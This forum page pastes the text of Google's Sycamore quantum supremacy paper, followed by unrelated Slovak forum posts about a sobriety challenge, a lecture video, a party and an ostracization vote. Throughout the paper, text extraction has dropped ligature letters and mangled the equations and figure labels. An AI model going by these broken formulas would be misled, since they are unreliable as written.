    This dramatic speedup relative to all known classical algorithms provides an experimental realization of quantum supremacy on a com- putational task and heralds the advent of a much-anticipated computing paradigm. In the early 1980s, Richard Feynman proposed that a quantum computer would be an e ective tool to solve problems in physics and chemistry, as it is exponentially costly to simulate large quantum systems with classical computers [1]. Realizing Feynman’s vision poses signi – cant experimental and theoretical challenges. First, can a quantum system be engineered to perform a computa- tion in a large enough computational (Hilbert) space and with low enough errors to provide a quantum speedup? Second, can we formulate a problem that is hard for a classical computer but easy for a quantum computer? By computing a novel benchmark task on our superconduct- ing qubit processor[2{7], we tackle both questions. Our experiment marks a milestone towards full scale quantum computing: quantum supremacy[8].

    In reaching this milestone, we show that quantum speedup is achievable in a real-world system and is not precluded by any hidden physical laws. Quantum supremacy also heralds the era of Noisy Intermediate- Scale Quantum (NISQ) technologies. The benchmark task we demonstrate has an immediate application in generating certi able random numbers[9]; other initial uses for this new computational capability may include optimization optimization [10{12], machine learning[13{ 15], materials science and chemistry [16{18]. However, realizing the full promise of quantum computing (e.g. Shor’s algorithm for factoring) still requires technical leaps to engineer fault-tolerant logical qubits[19{23].

    To achieve quantum supremacy, we made a number of technical advances which also pave the way towards er- ror correction. We developed fast, high- delity gates that can be executed simultaneously across a two-dimensional qubit array. We calibrated and benchmarked the pro- cessor at both the component and system level using a powerful new tool: cross-entropy benchmarking (XEB).

    Finally, we used component-level delities to accurately predict the performance of the whole system, further showing that quantum information behaves as expected when scaling to large systems. A COMPUTATIONAL TASK TO DEMONSTRATE QUANTUM SUPREMACY To demonstrate quantum supremacy, we compare our quantum processor against state-of-the-art classical com- puters in the task of sampling the output of a pseudo- random quantum circuit[24{26].

    Random circuits are a suitable choice for benchmarking since they do not pos- sess structure and therefore allow for limited guarantees of computational hardness[24, 25, 27, 28]. We design the circuits to entangle a set of quantum bits (qubits) by re- peated application of single-qubit and two-qubit logical operations. Sampling the quantum circuit’s output pro- duces a set of bitstrings, e.g. f0000101, 1011100, …g. Due to quantum interference, the probability distribution of the bitstrings resembles a speckled intensity pattern produced by light interference in laser scatter, such that some bitstrings are much more likely to occur than oth- ers. Classically computing this probability distribution becomes exponentially more di cult as the number of qubits (width) and number of gate cycles (depth) grows. We verify that the quantum processor is working prop- erly using a method called cross-entropy benchmarking (XEB) [24, 26], which compares how often each bitstring is observed experimentally with its corresponding ideal probability computed via simulation on a classical com- puter. For a given circuit, we collect the measured bit- strings fx igand compute the linear XEB delity [24{ 26, 29], which is the mean of the simulated probabilities of the bitstrings we measured: F XEB = 2 nhP(x i)i i 1 (1) where nis the number of qubits, P(x i) is the probability of bitstring x i computed for the ideal quantum circuit, and the average is over the observed bitstrings. Intu- itively, F XEB is correlated with how often we sample high probability bitstrings. When there are no errors in the quantum circuit, sampling the probability distribution will produce F XEB = 1. On the other hand, sampling from the uniform distribution will give hP(x i)i i = 1=2n and produce F XEB = 0. Values of F XEB between 0 and 2 Qubit Adjustable coupler a b 10 millimeters FIG. 1. The Sycamore processor. a, Layout of processor showing a rectangular array of 54 qubits (gray), each con- nected to its four nearest neighbors with couplers (blue). In- operable qubit is outlined. b, Optical image of the Sycamore chip. 1 correspond to the probability that no error has oc- curred while running the circuit.

    The probabilities P(x i) must be obtained from classically simulating the quan- tum circuit, and thus computing F XEB is intractable in the regime of quantum supremacy. However, with certain circuit simpli cations, we can obtain quantitative delity estimates of a fully operating processor running wide and deep quantum circuits. Our goal is to achieve a high enough F XEB for a circuit with su cient width and depth such that the classical computing cost is prohibitively large. This is a di cult task because our logic gates are imperfect and the quan- tum states we intend to create are sensitive to errors. A single bit or phase ip over the course of the algorithm will completely shu e the speckle pattern and result in close to 0 delity [24, 29].

    Therefore, in order to claim quantum supremacy we need a quantum processor that executes the program with su ciently low error rates. BUILDING AND CHARACTERIZING A HIGH-FIDELITY PROCESSOR We designed a quantum processor named Sycamore” which consists of a two-dimensional array of 54 trans- mon qubits, where each qubit is tunably coupled to four nearest-neighbors, in a rectangular lattice. The connec- tivity was chosen to be forward compatible with error- correction using the surface code [20].

    A key systems- engineering advance of this device is achieving high- delity single- and two-qubit operations, not just in iso- lation but also while performing a realistic computation with simultaneous gate operations on many qubits. We discuss the highlights below; extended details can be found in the supplementary information. In a superconducting circuit, conduction electrons con- dense into a macroscopic quantum state, such that cur- rents and voltages behave quantum mechanically [2, 30]. Our processor uses transmon qubits [6], which can be thought of as nonlinear superconducting resonators at 5 to 7 GHz.

    The qubit is encoded as the two lowest quan- tum eigenstates of the resonant circuit. Each transmon has two controls: a microwave drive to excite the qubit, and a magnetic ux control to tune the frequency. Each qubit is connected to a linear resonator used to read out the qubit state [5]. As shown in Fig. 1, each qubit is also connected to its neighboring qubits using a new ad- justable coupler [31, 32]. Our coupler design allows us to quickly tune the qubit-qubit coupling from completely o to 40 MHz. Since one qubit did not function properly the device uses 53 qubits and 86 couplers. The processor is fabricated using aluminum for metal- ization and Josephson junctions, and indium for bump- bonds between two silicon wafers. The chip is wire- bonded to a superconducting circuit board and cooled to below 20 mK in a dilution refrigerator to reduce am- bient thermal energy to well below the qubit energy. The processor is connected through lters and attenu- ators to room-temperature electronics, which synthesize the control signals.

    The state of all qubits can be read simultaneously by using a frequency-multiplexing tech- nique[33, 34]. We use two stages of cryogenic ampli ers to boost the signal, which is digitized (8 bits at 1 GS/s) and demultiplexed digitally at room temperature. In to- tal, we orchestrate 277 digital-to-analog converters (14 bits at 1 GS/s) for complete control of the quantum pro- cessor. We execute single-qubit gates by driving 25 ns mi- crowave pulses resonant with the qubit frequency while the qubit-qubit coupling is turned o .

    The pulses are shaped to minimize transitions to higher transmon states[35]. Gate performance varies strongly with fre- quency due to two-level-system (TLS) defects[36, 37], stray microwave modes, coupling to control lines and the readout resonator, residual stray coupling between qubits, ux noise, and pulse distortions. We therefore 3 Pauli and measurement errors CDF am, E ted histogr Integra e 1 e 2 e 2c e r a b Average error Single-qubit (e 1 ) Two-qubit (e 2 ) Two-qubit, cycle (e 2c ) Readout (e r ) Isolated 0.15% 0.36% 0.65% 3.1% Simultaneous 0.16% 0.62% 0.93% 3.8% Simultaneous Pauli error e 1 , e 2 10 -2 10 -3 Isolated FIG. 2. System-wide Pauli and measurement errors. a, Integrated histogram (empirical cumulative distribution func- tion, ECDF) of Pauli errors (black, green, blue) and readout errors (orange), measured on qubits in isolation (dotted lines) and when operating all qubits simultaneously (solid). The median of each distribution occurs at 0.50 on the vertical axis. Average (mean) values are shown below. b, Heatmap showing single- and two-qubit Pauli errors e 1 (crosses) and e 2 (bars) positioned in the layout of the processor. Values shown for all qubits operating simultaneously. optimize the single-qubit operation frequencies to miti- gate these error mechanisms. We benchmark single-qubit gate performance by using the XEB protocol described above, reduced to the single- qubit level (n= 1), to measure the probability of an error occurring during a single-qubit gate. On each qubit, we apply a variable number mof randomly selected gates and measure F XEB averaged over many sequences; as m increases, errors accumulate and average F XEB decays.

    We model this decay by [1 e 1=(1 1=D2)]m where e 1 is the Pauli error probability. The state (Hilbert) space di- mension term, D= 2n = 2, corrects for the depolarizing model where states with errors partially overlap with the ideal state. This procedure is similar to the more typical technique of randomized benchmarking [21, 38, 39], but supports non-Cli ord gatesets [40] and can separate out decoherence error from coherent control error. We then repeat the experiment with all qubits executing single- qubit gates simultaneously (Fig.2), which shows only a small increase in the error probabilities, demonstrating that our device has low microwave crosstalk. We perform two-qubit iSWAP-like entangling gates by bringing neighboring qubits on resonance and turning on a 20 MHz coupling for 12 ns, which allows the qubits to swap excitations. During this time, the qubits also ex- perience a controlled-phase (CZ) interaction, which orig- inates from the higher levels of the transmon. The two- qubit gate frequency trajectories of each pair of qubits are optimized to mitigate the same error mechanisms consid- ered in optimizing single-qubit operation frequencies. To characterize and benchmark the two-qubit gates, we run two-qubit circuits with mcycles, where each cy- cle contains a randomly chosen single-qubit gate on each of the two qubits followed by a xed two-qubit gate. We learn the parameters of the two-qubit unitary (e.g. the amount of iSWAP and CZ interaction) by using F XEB as a cost function. After this optimization, we extract the per-cycle error e 2c from the decay of F XEB with m, and isolate the two-qubit error e 2 by subtracting the two single-qubit errors e 1. We nd an average e 2 of 0:36%.

    Additionally, we repeat the same procedure while simul- taneously running two-qubit circuits for the entire array. After updating the unitary parameters to account for ef- fects such as dispersive shifts and crosstalk, we nd an average e 2 of 0.62%. For the full experiment, we generate quantum circuits using the two-qubit unitaries measured for each pair dur- ing simultaneous operation, rather than a standard gate for all pairs. The typical two-qubit gate is a full iSWAP with 1=6 of a full CZ. In principle, our architecture could generate unitaries with arbitrary iSWAP and CZ inter- actions, but reliably generating a target unitary remains an active area of research. Finally, we benchmark qubit readout using standard dispersive measurement [41]. Measurement errors aver- aged over the 0 and 1 states are shown in Fig 2a.

    We have also measured the error when operating all qubits simul- taneously, by randomly preparing each qubit in the 0 or 1 state and then measuring all qubits for the probability of the correct result. We nd that simultaneous readout incurs only a modest increase in per-qubit measurement errors. Having found the error rates of the individual gates and readout, we can model the delity of a quantum circuit as the product of the probabilities of error-free opera- 4 single-qubit gate: 25 ns qubit XY control two-qubit gate: 12 ns qubit 1 Z control qubit 2 Z control coupler cycle: 1 2 3 4 5 6 m time column row 7 8 A BC D A B D C a b FIG. 3. Control operations for the quantum supremacy circuits. a, Example quantum circuit instance used in our experiment. Every cycle includes a layer each of single- and two-qubit gates. The single-qubit gates are chosen randomly from f p X; p Y; p Wg. The sequence of two-qubit gates are chosen according to a tiling pattern, coupling each qubit sequentially to its four nearest-neighbor qubits.

    The couplers are divided into four subsets (ABCD), each of which is executed simultaneously across the entire array corresponding to shaded colors. Here we show an intractable sequence (repeat ABCDCDAB); we also use di erent coupler subsets along with a simpli able sequence (repeat EFGHEFGH, not shown) that can be simulated on a classical computer. b, Waveform of control signals for single- and two-qubit gates. tion of all gates and measurements. Our largest random quantum circuits have 53 qubits, 1113 single-qubit gates, 430 two-qubit gates, and a measurement on each qubit, for which we predict a total delity of 0:2%.

    This delity should be resolvable with a few million measurements, since the uncertainty on F XEB is 1= p N s, where N s is the number of samples. Our model assumes that entangling larger and larger systems does not introduce additional error sources beyond the errors we measure at the single- and two-qubit level | in the next section we will see how well this hypothesis holds. FIDELITY ESTIMATION IN THE SUPREMACY REGIME The gate sequence for our pseudo-random quantum circuit generation is shown in Fig.3. One cycle of the algorithm consists of applying single-qubit gates chosen randomly from f p X; p Y; p Wgon all qubits, followed by two-qubit gates on pairs of qubits. The sequences of gates which form the supremacy circuits” are designed to minimize the circuit depth required to create a highly entangled state, which ensures computational complexity and classical hardness. While we cannot compute F XEB in the supremacy regime, we can estimate it using three variations to re- duce the complexity of the circuits.

    In patch circuits”, we remove a slice of two-qubit gates (a small fraction of the total number of two-qubit gates), splitting the cir- cuit into two spatially isolated, non-interacting patches of qubits. We then compute the total delity as the product of the patch delities, each of which can be easily calcu- lated. In elided circuits”, we remove only a fraction of the initial two-qubit gates along the slice, allowing for entanglement between patches, which more closely mim- ics the full experiment while still maintaining simulation feasibility. Finally, we can also run full veri cation cir- cuits” with the same gate counts as our supremacy cir- cuits, but with a di erent pattern for the sequence of two- qubit gates which is much easier to simulate classically [29]. Comparison between these variations allows track- ing of the system delity as we approach the supremacy regime. We rst check that the patch and elided versions of the veri cation circuits produce the same delity as the full veri cation circuits up to 53 qubits, as shown in Fig.4a. For each data point, we typically collect N s = 5 106 total samples over ten circuit instances, where instances di er only in the choices of single-qubit gates in each cycle.

    We also show predicted F XEB values computed by multiplying the no-error probabilities of single- and two-qubit gates and measurement [29]. Patch, elided, and predicted delities all show good agreement with the delities of the corresponding full circuits, despite the vast di erences in computational complexity and en- tanglement. This gives us con dence that elided circuits can be used to accurately estimate the delity of more complex circuits. We proceed now to benchmark our most computa- tionally di cult circuits. In Fig.4b, we show the mea- sured F XEB for 53-qubit patch and elided versions of the full supremacy circuits with increasing depth.

    For the largest circuit with 53 qubits and 20 cycles, we collected N s = 30 106 samples over 10 circuit instances, obtaining F XEB = (2:24 0:21) 10 3 for the elided circuits. With 5˙con dence, we assert that the average delity of run- ning these circuits on the quantum processor is greater than at least 0.1%. The full data for Fig.4b should have similar delities, but are only archived since the simula- tion times (red numbers) take too long. It is thus in the quantum supremacy regime. 5 number of qubits, n number of cycles, m n = 53 qubits a Classically veriable b Supremacy regime idelity, XEB F

    XEB m = 14 cycles Prediction from gate and measurement errors Full circuit Elided circuit Patch circuit Prediction Patch E F G H A B C D C D A B Elided (±5 error bars) 10 millennia 100 years 600 years 4 years 4 years 2 weeks 1 week 2 hour sC la ic mp ng @ Sycamore 5 hours Classical verication Sycamore sampling (N s = 1M): 200 seconds 10 15 20 25 30 35 40 45 50 55 12 14 16 18 20 10 -3 10 -2 10 -1 10 0 FIG. 4. Demonstrating quantum supremacy. a, Veri cation of benchmarking methods. F XEB values for patch, elided, and full veri cation circuits are calculated from measured bitstrings and the corresponding probabilities predicted by classical simulation. Here, the two-qubit gates are applied in a simpli able tiling and sequence such that the full circuits can be simulated out to n= 53;m= 14 in a reasonable amount of time. Each data point is an average over 10 distinct quantum circuit instances that di er in their single-qubit gates (for n= 39;42;43 only 2 instances were simulated). For each n, each instance is sampled with N s between 0:5M and 2:5M.

    The black line shows predicted F XEB based on single- and two-qubit gate and measurement errors. The close correspondence between all four curves, despite their vast di erences in complexity, justi es the use of elided circuits to estimate delity in the supremacy regime. b, Estimating F XEB in the quantum supremacy regime. Here, the two-qubit gates are applied in a non-simpli able tiling and sequence for which it is much harder to simulate. For the largest elided data (n= 53, m= 20, total N s = 30M), we nd an average F XEB >0.1% with 5˙con dence, where ˙includes both systematic and statistical uncertainties.

    The corresponding full circuit data, not simulated but archived, is expected to show similarly signi cant delity. For m= 20, obtaining 1M samples on the quantum processor takes 200 seconds, while an equal delity classical sampling would take 10,000 years on 1M cores, and verifying the delity would take millions of years. DETERMINING THE CLASSICAL COMPUTATIONAL COST We simulate the quantum circuits used in the exper- iment on classical computers for two purposes: verify- ing our quantum processor and benchmarking methods by computing F XEB where possible using simpli able circuits (Fig.4a), and estimating F XEB as well as the classical cost of sampling our hardest circuits (Fig.4b).

    Up to 43 qubits, we use a Schr odinger algorithm (SA) which simulates the evolution of the full quantum state; the Ju lich supercomputer(100k cores, 250TB) runs the largest cases. Above this size, there is not enough RAM to store the quantum state [42]. For larger qubit num- bers, we use a hybrid Schr odinger-Feynman algorithm (SFA)[43] running on Google data centers to compute the amplitudes of individual bitstrings. This algorithm breaks the circuit up into two patches of qubits and e - ciently simulates each patch using a Schr odinger method, before connecting them using an approach reminiscent of the Feynman path-integral.

    While it is more memory- e cient, SFA becomes exponentially more computation- ally expensive with increasing circuit depth due to the exponential growth of paths with the number of gates connecting the patches. To estimate the classical computational cost of the supremacy circuits (gray numbers, Fig.4b), we ran por- tions of the quantum circuit simulation on both the Sum- mit supercomputer as well as on Google clusters and ex- trapolated to the full cost. In this extrapolation, we account for the computational cost scaling with F XEB, e.g. the 0.1% delity decreases the cost by 1000[43, 44]. On the Summit supercomputer, which is currently the most powerful in the world, we used a method inspired by Feynman path-integrals that is most e cient at low depth[44{47].

    At m= 20 the tensors do not reasonably t in node memory, so we can only measure runtimes up to m= 14, for which we estimate that sampling 3M bitstrings with 1% delity would require 1 year. 6 On Google Cloud servers, we estimate that perform- ing the same task for m= 20 with 0:1% delity using the SFA algorithm would cost 50 trillion core-hours and consume 1 petawatt hour of energy. To put this in per- spective, it took 600 seconds to sample the circuit on the quantum processor 3 million times, where sampling time is limited by control hardware communications; in fact, the net quantum processor time is only about 30 seconds. The bitstring samples from this largest circuit are archived online. One may wonder to what extent algorithmic innova- tion can enhance classical simulations. Our assumption, based on insights from complexity theory, is that the cost of this algorithmic task is exponential in nas well as m. Indeed, simulation methods have improved steadily over the past few years[42{50].

    We expect that lower simula- tion costs than reported here will eventually be achieved, but we also expect they will be consistently outpaced by hardware improvements on larger quantum processors. VERIFYING THE DIGITAL ERROR MODEL A key assumption underlying the theory of quantum error correction is that quantum state errors may be con- sidered digitized and localized [38, 51]. Under such a dig- ital model, all errors in the evolving quantum state may be characterized by a set of localized Pauli errors (bit- and/or phase- ips) interspersed into the circuit. Since continuous amplitudes are fundamental to quantum me- chanics, it needs to be tested whether errors in a quantum system could be treated as discrete and probabilistic. In- deed, our experimental observations support the validity of this model for our processor. Our system delity is well predicted by a simple model in which the individ- ually characterized delities of each gate are multiplied together (Fig

    4). To be successfully described by a digitized error model, a system should be low in correlated errors. We achieve this in our experiment by choosing circuits that ran- domize and decorrelate errors, by optimizing control to minimize systematic errors and leakage, and by design- ing gates that operate much faster than correlated noise sources, such as 1=f ux noise [37]. Demonstrating a pre- dictive uncorrelated error model up to a Hilbert space of size 253 shows that we can build a system where quantum resources, such as entanglement, are not prohibitively fragile. WHAT DOES THE FUTURE HOLD?

    Quantum processors based on superconducting qubits can now perform computations in a Hilbert space of di- mension 253 ˇ9 1015, beyond the reach of the fastest classical supercomputers available today. To our knowl- edge, this experiment marks the rst computation that can only be performed on a quantum processor. Quan- tum processors have thus reached the regime of quantum supremacy. We expect their computational power will continue to grow at a double exponential rate: the clas- sical cost of simulating a quantum circuit increases expo- nentially with computational volume, and hardware im- provements will likely follow a quantum-processor equiv- alent of Moore’s law [52, 53], doubling this computational volume every few years. To sustain the double exponen- tial growth rate and to eventually o er the computational volume needed to run well-known quantum algorithms, such as the Shor or Grover algorithms [19, 54], the engi- neering of quantum error correction will have to become a focus of attention. The Extended Church-Turing Thesis” formulated by Bernstein and Vazirani [55] asserts that any reasonable” model of computation can be e ciently simulated by a Turing machine. Our experiment suggests that a model of computation may now be available that violates this assertion.

    We have performed random quantum circuit sampling in polynomial time with a physically realized quantum processor (with su ciently low error rates), yet no e cient method is known to exist for classical comput- ing machinery. As a result of these developments, quan- tum computing is transitioning from a research topic to a technology that unlocks new computational capabilities. We are only one creative algorithm away from valuable near-term applications. Acknowledgments We are grateful to Eric Schmidt, Sergey Brin, Je Dean, and Jay Yagnik for their executive sponsorship of the Google AI Quantum team, and for their continued engagement and support. We thank Peter Norvig for reviewing a draft of the manuscript, and Sergey Knysh for useful discussions.

    We thank Kevin Kissel, Joey Raso, Davinci Yonge-Mallo, Orion Martin, and Niranjan Sridhar for their help with simulations. We thank Gina Bortoli and Lily Laws for keeping our team organized. This research used resources from the Oak Ridge Leadership Computing Facility, which is a DOE O ce of Science User Facility supported un- der Contract DE-AC05-00OR22725.

    A portion of this work was performed in the UCSB Nanofabrication Facility, an open access laboratory. Author contributions The Google AI Quantum team conceived of the experiment. The applications and algorithms team provided the theoretical foundation and the speci cs of the algorithm. The hardware team carried out the experiment and collected the data. The data analysis was done jointly with outside collaborators.

    [1]Feynman, R. P. Simulating physics with computers. Int. J. Theor. Phys. 21, 467{488 (1982).

    [2]Devoret, M. H., Martinis, J. M. & Clarke, J. Mea- surements of macroscopic quantum tunneling out of the zero-voltage state of a current-biased josephson junction. Phys. Rev. Lett 55, 1908 (1985).

    [3]Nakamura, Y., Chen, C. D. & Tsai, J. S. Spectroscopy of energy-level splitting between two macroscopic quan- tum states of charge coherently superposed by josephson coupling. Phys. Rev. Lett. 79, 2328 (1997).

    [4]Mooij, J. et al. Josephson persistent-current qubit. Sci- ence 285, 1036 (1999).

    [5]Wallra , A. et al. Strong coupling of a single photon to a superconducting qubit using circuit quantum electrody- namics. Nature 431, 162 (2004).

    [6]Koch, J. et al. Charge-insensitive qubit design derived from the cooper pair box. Phys. Rev. A 76, 042319 (2007).

    [7]You, J. Q. & Nori, F. Atomic physics and quantum optics using superconducting circuits. Nature 474, 589 (2011).

    [8]Preskill, J. Quantum computing and the entanglement frontier. Rapporteur talk at the 25th Solvay Conference on Physics, Brussels (2012).

    [9]Aaronson, S. Certi ed randomness from quantum supremacy. In preparation .

    [10]Hastings, M. B. Classical and Quantum Bounded Depth Approximation Algorithms. arXiv e-prints arXiv:1905.07047 (2019). 1905.07047.

    [11]Kechedzhi, K. et al. E cient population transfer via non- ergodic extended states in quantum spin glass. arXiv e-prints arXiv:1807.04792 (2018). 1807.04792.

    [12]Somma, R. D., Boixo, S., Barnum, H. & Knill, E. Quan- tum simulations of classical annealing processes. Phys. Rev. Lett. letters 101, 130504 (2008).

    [13]McClean, J. R., Boixo, S., Smelyanskiy, V. N., Babbush, R. & Neven, H. Barren plateaus in quantum neural net- work training landscapes. Nat. Comm. 9, 4812 (2018).

    [14]Cong, I., Choi, S. & Lukin, M. D. Quantum convolutional neural networks. arXiv:1810.03787 (2018).

    [15]Bravyi, S., Gosset, D. & K onig, R. Quantum advantage with shallow circuits. Science 362, 308{311 (2018).

    [16]Aspuru-Guzik, A., Dutoi, A. D., Love, P. J. & Head- Gordon, M. Simulated quantum computation of molecu- lar energies. Science 309, 1704{1707 (2005).

    [17]Peruzzo, A. et al. A variational eigenvalue solver on a photonic quantum processor. Nat. Commun. 5, 4213 (2014). [18]Hempel, C. et al. Quantum chemistry calculations on a trapped-ion quantum simulator. Phys. Rev. X 8, 031022 (2018).

    [19]Shor, P. W. Algorithms for quantum computation: dis- crete logarithms and factoring proceedings. Proceedings 35th Annual Symposium on Foundations of Computer Science (1994).

    [20]Fowler, A. G., Mariantoni, M., Martinis, J. M. & Cle- land, A. N. Surface codes: Towards practical large-scale quantum computation. Phys. Rev. A 86, 032324 (2012).

    [21]Barends, R. et al. Superconducting quantum circuits at the surface code threshold for fault tolerance. Nature 508, 500{503 (2014).

    [22]C orcoles, A. D. et al. Demonstration of a quantum error detection code using a square lattice of four supercon- ducting qubits. Nat. Commun. 6, 6979 (2015).

    [23]Ofek, N. et al. Extending the lifetime of a quantum bit with error correction in superconducting circuits. Nature 536, 441 (2016).

    [24]Boixo, S. et al. Characterizing quantum supremacy in near-term devices. Nat. Phys. 14, 595 (2018).

    [25]Aaronson, S. & Chen, L. Complexity-theoretic founda- tions of quantum supremacy experiments. In 32nd Com- putational Complexity Conference (CCC 2017) (2017).

    [26]Neill, C. et al. A blueprint for demonstrating quantum supremacy with superconducting qubits. Science 360, 195{199 (2018).

    [27]Bremner, M. J., Montanaro, A. & Shepherd, D. J. Average-case complexity versus approximate simulation of commuting quantum computations. Phys. Rev. Lett. 117, 080501 (2016).

    [28]Bouland, A., Fe erman, B., Nirkhe, C. & Vazi- rani, U. Quantum supremacy and the com- plexity of random circuit sampling. Preprint at https://arxiv.org/abs/1803.04402 (2018).

    [29]See supplementary information .

    [30]Vool, U. & Devoret, M. Introduction to quantum electro- magnetic circuits. Int. J. Circ. Theor. Appl. 45, 897{934 (2017). 8

    [31]Chen, Y. et al. Qubit architecture with high coherence and fast tunable coupling circuits. Phys. Rev. Lett. 113, 220502 (2014).

    [32]Yan, F. et al. A tunable coupling scheme for implement- ing high- delity two-qubit gates. Phys. Rev. Applied 10, 054062 (2018).

    [33]Schuster, D. I. et al. Resolving photon number states in a superconducting circuit. Nature 445, 515 (2007).

    [34]Je rey, E. et al. Fast accurate state measurement with superconducting qubits. Phys. Rev. Lett. 112, 190504 (2014).

    [35]Chen, Z. et al. Measuring and suppressing quantum state leakage in a superconducting qubit. Phys. Rev. Lett. 116, 020501 (2016).

    [36]Klimov, P. V. et al. Fluctuations of energy-relaxation times in superconducting qubits. Phys. Rev. Lett. 121, 090502 (2018).

    [37]Yan, F. et al. The ux qubit revisited to enhance coher- ence and reproducibility. Nat. Commun. 7, 12964 (2016).

    [38]Knill, E. et al. Randomized benchmarking of quantum gates. Phys. Rev. A 77, 012307 (2008).

    [39]Magesan, E., Gambetta, J. M. & Emerson, J. Scalable and robust randomized benchmarking of quantum pro- cesses. Phys. Rev. Lett. 106, 180504 (2011).

    [40]Cross, A. W., Magesan, E., Bishop, L. S., Smolin, J. A. & Gambetta, J. M. Scalable randomised benchmarking of non-cli ord gates. NPJ Quantum Information 2, 16012 (2016).

    [41]Wallra , A. et al. Approaching unit visibility for control of a superconducting qubit with dispersive readout. Phys. Rev. Lett. 95, 060501 (2005).

    [42]De Raedt, H. et al. Massively parallel quantum computer simulator, eleven years later. Comput. Phys. Commun. 237, 47 { 61 (2019).

    [43]Markov, I. L., Fatima, A., Isakov, S. V. & Boixo, S. Quantum supremacy is both closer and farther than it appears. Preprint at https://arxiv.org/abs/1807.10749 (2018).

    [44]Villalonga, B. et al. A exible high-performance sim- ulator for the veri cation and benchmarking of quan- tum circuits implemented on real hardware. Preprint at https://arxiv.org/abs/1811.09599 (2018).

    [45]Boixo, S., Isakov, S. V., Smelyanskiy, V. N. & Neven, H. Simulation of low-depth quantum circuits as complex undirected graphical models. Preprint at https://arxiv.org/abs/1712.05384 (2017).

    [46]Chen, J., Zhang, F., Huang, C., Newman, M. & Shi, Y. Classical simulation of intermediate-size quantum circuits. Preprint at https://arxiv.org/abs/1805.01450 (2018).

    [47]Villalonga, B. et al. Establishing the quantum supremacy frontier with a 281 p op/s simulation. Preprint at https://arxiv.org/abs/1905.00444 (2019).

    [48]Pednault, E. et al. Breaking the 49-qubit barrier in the simulation of quantum circuits. Preprint at https://arxiv.org/abs/1710.05867 (2017).

    [49]Chen, Z. Y. et al. 64-qubit quantum circuit simulation. Sci. Bull. 63, 964{971 (2018).

    [50]Chen, M.-C. et al. Quantum teleportation-inspired al- gorithm for sampling large random quantum circuits. Preprint at https://arxiv.org/abs/1901.05003 (2019).

    [51]Shor, P. W. Scheme for reducing decoherence in quan- tum computer memory. Phys. Rev. A 52, R2493{R2496 (1995).

    [52]Devoret, M. H. & Schoelkopf, R. J. Superconducting circuits for quantum information: An outlook. Science 339, 1169{1174 (2013).

    [53]Mohseni, M. et al. Commercialize quantum technologies in ve years. Nature 543, 171 (2017).

    [54]Grover, L. K. Quantum mechanics helps in searching for a needle in a haystack. letters 79, 325 (1997).
    [55]Bernstein, E. & Vazirani, U. Quantum complexity the- ory. Proc. 25th Annual ACM Symposium on Theory of Computing (1993). from my iPhone
    more children: (3)
  • 000001010000000108663551
    Synapse creator 19.09.2019 - 10:39:49 (modif: 18.10.2019 - 10:47:00) level: 1 UP [31K] New Hardlink Content changed
    Sober October 2019

    Sober October 2019 zacina v utorok 1.10. a konci vo stvrtok 31.10.

    Pravidla su jednoduche:
    1: Ostat triezvy.
    2. Hit the gym.


    Toto je miesto pre vzajomnu motivaciu a inspiraciu. Niekto bude menej chlastat, iny pojde full monk mode. Niekto urobi zopar zdechlych klikov, iny odmaka 5 treningov za tyzden a bude meditovat. Nie je to dolezite. Dolezite je, udrzat si spravny spirit po cely mesiac, nevysrat sa na to, nevzdat to po prvom zavahani, motivovat sam seba a ostatnych.

    Kto nedrzi sober october, nech prosim poriadne zvazi, ci sa potrebuje zapojit do diskusie v tomto fore.
    more children: (47)
  • 000001010000000108662052
    Synapse creator 13.09.2019 - 08:45:22 (modif: 13.09.2019 - 08:46:30) level: 1 UP [21K] New Hardlink Content changed
    V ramci mojho byvaleho zamestnania sme si s kolegami robili prednasky o veciach, ktore nas zaujimaju, ale netykaju sa priamo prace. Este pred mojim odchodom z firmy, par mesiacov dozadu, som si nachystal slidy a pripravil prednasku o QC, ale spustili sa mi podivne zdravotne problemy a nikdy som sa nedostal k samotnej prezentacii. No pri rozlucke som prislubil, ze tu prednasku spravim, az sa dam dokopy. Vcera som to teda skusil a nahral som si to.

    je to dlhe, relevantna cast zacina 5:45. nie som sice ziadny veritasium, ale myslim, ze video ma sancu pomoct ludom, ktori nemaju o QC ani sajnu. zaroven by som sa chcel v podobnych cinnostiach zlepsit, tak idem s kozou na trh. veci som sa snazil v prednaske co najviac zjednodusit a neviem, ci som to niekedy neprehnal, resp. netusim v kolkych veciach som ja sam (samouk) uplne mimo, takze bacha na to.

    more children: (4)
  • 000001010000000108661830
    Synapse creator 12.09.2019 - 14:26:23 (modif: 13.09.2019 - 18:56:05) level: 1 UP [1K] New Hardlink Content changed
    Dnes (13.9.) robíme ďalšiu Elektro Haflu, party zameranú na klubový zvuk blízkeho východu v Novej Cvernovke, tentokrát v spojení s [fjúžn] festivalom.
    Príde Arabian Panther, Amar du Désert, DJ Ramzy al Spinoza a otvorí to Mooshak.

    FB event: https://www.facebook.com/events/938872153112098/
    Sú tam aj links na umelcov, odporúčam, je to výborná hudba.

    Lineup:
    Sála:
    18:00 - Diskusia: Stredoeurópske fórum: O slobode prejavu -> event: https://www.facebook.com/events/2528863677181460/

    Park de Palma:
    19:00 - 22:00 Mooshak

    Skrytý bar:
    22:00 - 00:00 Amar Du Désert
    00:00 - 02:00 النمر العربي Arabian Panther
    02:00 - 04:00 Dj RAMZY al spinoza

    Lístky na Elektro Haflu sú k dispozícii za 5€ tu: https://bit.ly/2kEsgN1
    Na mieste 7€.

    Jo a budeme tam oslavovať s id g_da naše tri dekády na tomto svete. Ak ešte nebudeme na šalát, môžete nás pozvať na drink :)

    elektro-hafla-2-plagat-small.png
  • 000001010000000108659133
    Synapse creator 04.09.2019 - 12:20:08 level: 1 UP New Hardlink
    Cancel the ostracization of id 644892 (azazel) ?

    (based upon culoar request https://kyberia.sk/id/8658790/ )
    more children: (2)
  • 000001010000000108658195
    Synapse creator 02.09.2019 - 14:01:35 level: 1 UP [4K] New Hardlink
    ked uz sa lobuje za config kyberky:

    momentalne parametre na ostrakizaciu su nastavene tak, aby sa velmi lahko dal vypudit clovek z kyberie - konkretne 12K.

    Je to pohodlne pre tych, ktori nie su tolerantni voci nazorom ostatnych, ak sa teda nezhoduju s ich vlastnymi. Ked sa outkastoval nedavno azazel, malo to aspon svoje opodstatnenie, kedze vela ludi ho malo v silence, ale aj tak mi prisla hodnota 12K malo.

